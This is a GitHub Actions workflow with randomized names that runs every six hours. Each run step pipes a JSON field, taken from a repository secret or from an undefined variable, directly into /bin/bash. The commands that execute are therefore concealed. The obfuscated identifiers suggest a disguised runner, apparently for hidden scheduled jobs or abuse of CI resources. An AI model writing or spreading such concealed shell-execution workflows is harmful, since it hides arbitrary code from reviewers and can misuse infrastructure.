name: dongaoxiong6715
on:
  workflow_dispatch:
  schedule:
    - cron: '3 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongaoxiong6715
        env:
          eh50: ${{ secrets.eh50 }}
        run: |
          echo $eh50 | jq -r .et17 | /bin/bash
          echo $nvmsg7151 | jq -r .fl23812 | /bin/bash
          echo $tvt3 | jq -r .ybd2 | /bin/bash
          echo $cbp40 | jq -r .mg5979 | /bin/bash
          echo $zg2861 | jq -r .b52 | /bin/bash
          echo $tom84 | jq -r .bn7039 | /bin/bash
          echo $fepig8570 | jq -r .jpf906 | /bin/bash

